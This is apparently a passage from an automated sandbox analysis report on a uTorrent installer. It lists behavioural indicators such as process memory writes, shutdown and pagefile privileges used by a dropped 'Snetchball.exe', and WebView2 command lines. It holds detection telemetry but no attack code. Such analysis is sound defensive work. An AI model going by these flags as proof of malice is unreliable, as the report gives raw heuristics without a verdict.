Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DF6FB.tmp\BvDOO.tmp N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3M3MK.tmp\IFVII4XGy4B4o.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3M3MK.tmp\IFVII4XGy4B4o.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-5SD8N.tmp\utorrent9.tmp N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 396 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\utorrent_installer.exe C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe
PID 396 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\utorrent_installer.exe C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe
PID 396 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\utorrent_installer.exe C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe
PID 3132 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe
PID 3132 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe
PID 3132 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe
PID 2008 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe
PID 2008 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe
PID 2008 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe
PID 2008 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe
PID 2008 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe
PID 2008 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe
PID 1408 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1408 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1992 wrote to memory of 2808 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1992 wrote to memory of 2808 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 2008 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe
PID 2008 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe
PID 2008 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe
PID 1984 wrote to memory of 4548 N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1984 wrote to memory of 4548 N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 4548 wrote to memory of 4092 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 4548 wrote to memory of 4092 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 3152 wrote to memory of 1016 N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 3152 wrote to memory of 1016 N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1016 wrote to memory of 2696 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1016 wrote to memory of 2696 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 2008 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe
PID 2008 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe
PID 2008 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe
PID 4508 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 4508 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1232 wrote to memory of 2640 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1232 wrote to memory of 2640 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1016 wrote to memory of 2108 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1016 wrote to memory of 2108 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1016 wrote to memory of 2108 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1016 wrote to memory of 2108 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1016 wrote to memory of 2108 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

Processes

C:\Users\Admin\AppData\Local\Temp\utorrent_installer.exe

"C:\Users\Admin\AppData\Local\Temp\utorrent_installer.exe"

C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe

"C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe"

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{E2B3C97F-6AE1-41AC-817A-F6F92166D7DD}

C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe

uTorrent.exe /NOINSTALL /BRINGTOFRONT

C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe

"C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe" uTorrent_2008_03CB62E8_1570869978 µTorrent4823DF041B09 uTorrent ce unp

C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe

"C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe" uTorrent_2008_03CB5948_408977520 µTorrent4823DF041B09 uTorrent ce unp

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=utorrentie.exe --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --no-default-browser-check --disable-component-extensions-with-background-pages --no-first-run --disable-default-apps --noerrdialogs --embedded-browser-webview-dpi-awareness=0 --disable-features=msEnhancedTrackingPreventionEnabled --disable-popup-blocking --internet-explorer-integration=none --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --mojo-named-platform-channel-pipe=1408.5068.16614229064555360265

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Crashpad --metrics-dir=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0xe0,0x1b4,0x7fffcb093cb8,0x7fffcb093cc8,0x7fffcb093cd8

C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe

"C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe" uTorrent_2008_03CB6080_1125046369 µTorrent4823DF041B09 uTorrent ce unp

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=utorrentie.exe --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --no-default-browser-check --disable-component-extensions-with-background-pages --no-first-run --disable-default-apps --noerrdialogs --embedded-browser-webview-dpi-awareness=0 --disable-features=msEnhancedTrackingPreventionEnabled --disable-popup-blocking --internet-explorer-integration=none --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --mojo-named-platform-channel-pipe=1984.4748.5186240804764680059

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Crashpad --metrics-dir=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0xe0,0x1a8,0x7fffcb093cb8,0x7fffcb093cc8,0x7fffcb093cd8

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=utorrentie.exe --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --no-default-browser-check --disable-component-extensions-with-background-pages --no-first-run --disable-default-apps --noerrdialogs --embedded-browser-webview-dpi-awareness=0 --disable-features=msEnhancedTrackingPreventionEnabled --disable-popup-blocking --internet-explorer-integration=none --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --mojo-named-platform-channel-pipe=3152.3928.2209418904843276179

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Crashpad --metrics-dir=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0xe4,0x1bc,0x7fffcb093cb8,0x7fffcb093cc8,0x7fffcb093cd8

C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe

"C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe" uTorrent_2008_03CB62E8_1863064785 µTorrent4823DF041B09 uTorrent ce unp

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=utorrentie.exe --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --no-default-browser-check --disable-component-extensions-with-background-pages --no-first-run --disable-default-apps --noerrdialogs --embedded-browser-webview-dpi-awareness=0 --disable-features=msEnhancedTrackingPreventionEnabled --disable-popup-blocking --internet-explorer-integration=none --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --mojo-named-platform-channel-pipe=4508.2444.15427354753745200292

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Crashpad --metrics-dir=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0xe0,0x1b4,0x7fffcb093cb8,0x7fffcb093cc8,0x7fffcb093cd8

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=gpu-process --field-trial-handle=1896,14695144487908411897,14174798435327063996,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1912 /prefetch:2

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1896,14695144487908411897,14174798435327063996,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=1972 /prefetch:3

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

